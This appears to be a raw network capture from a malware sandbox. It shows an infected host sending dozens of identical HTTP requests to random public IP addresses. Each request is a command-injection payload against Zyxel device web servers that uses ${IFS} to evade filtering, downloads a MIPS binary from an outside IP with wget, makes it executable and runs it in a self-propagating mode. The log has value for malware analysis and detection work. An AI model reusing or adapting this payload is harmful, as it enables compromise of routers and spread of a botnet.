                                    Jan 13, 2024 19:02:29.060673952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3145192.168.2.1342986126.178.214.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060730934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3146192.168.2.1342102205.81.109.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060782909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3147192.168.2.134821469.176.169.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060827017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3148192.168.2.1339316151.57.28.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060902119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3149192.168.2.1347190181.66.186.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060961008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3150192.168.2.1360492138.202.223.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060987949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3151192.168.2.13412665.219.52.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061079979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3152192.168.2.1333592118.240.79.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061089039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3153192.168.2.1343528134.229.45.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061141014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3154192.168.2.1342926194.147.173.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061176062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3155192.168.2.1357042191.85.254.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061240911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3156192.168.2.1344582204.177.244.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061292887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3157192.168.2.133447234.51.113.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061310053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3158192.168.2.1342828152.193.241.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061338902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3159192.168.2.1357446125.188.253.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061384916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3160192.168.2.1347510163.17.21.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061464071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3161192.168.2.1354040134.91.228.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061537981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3162192.168.2.134954032.44.203.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061605930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3163192.168.2.134498035.108.215.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061645031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3164192.168.2.1348384171.40.173.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061733961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3165192.168.2.1344374130.89.51.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061789989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3166192.168.2.1346420211.173.168.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061832905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3167192.168.2.1350566187.12.131.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061868906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3168192.168.2.134045648.135.80.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061939955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3169192.168.2.135908667.226.165.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.061975956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3170192.168.2.1347734153.76.189.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062006950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3171192.168.2.1348182114.208.214.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062062979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3172192.168.2.133789475.32.226.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062133074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3173192.168.2.135297661.223.87.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062180042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3174192.168.2.1355008213.133.83.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062227011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3175192.168.2.1333244119.64.160.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062283993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3176192.168.2.1340360189.65.255.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062340975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3177192.168.2.1343544132.248.176.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062414885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3178192.168.2.1349464143.173.80.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062485933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3179192.168.2.134009299.68.253.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062531948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3180192.168.2.1347872166.118.165.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062587023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3181192.168.2.1344376157.17.115.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062649012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3182192.168.2.133786223.138.160.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062695026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3183192.168.2.133898824.97.138.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062724113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3184192.168.2.1356010199.158.226.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062805891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3185192.168.2.1339476218.41.196.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062866926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3186192.168.2.134847692.232.140.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062905073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3187192.168.2.1350600101.76.52.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.062958002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3188192.168.2.1359874222.193.156.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063008070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3189192.168.2.134837657.23.59.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063055038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3190192.168.2.1353238109.212.132.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063123941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3191192.168.2.1334176142.6.111.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063219070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3192192.168.2.1348446186.49.219.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063277960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3193192.168.2.133569878.49.128.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063359022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3194192.168.2.134906061.34.209.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063421965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3195192.168.2.1360590173.120.187.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063465118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3196192.168.2.134532845.181.46.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063530922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3197192.168.2.1348614168.84.28.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063576937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3198192.168.2.134378674.13.248.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063640118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3199192.168.2.135701070.42.168.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063708067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3200192.168.2.1336150131.17.144.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063762903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3201192.168.2.1352134176.214.135.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063815117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3202192.168.2.135563034.9.140.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063894987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3203192.168.2.134184288.56.120.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.063939095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3204192.168.2.134585219.2.144.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064002037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3205192.168.2.1336984138.56.40.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064050913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3206192.168.2.1336942218.173.38.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064100027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3207192.168.2.135528245.143.245.177443
                                    TimestampBytes transferredDirectionData
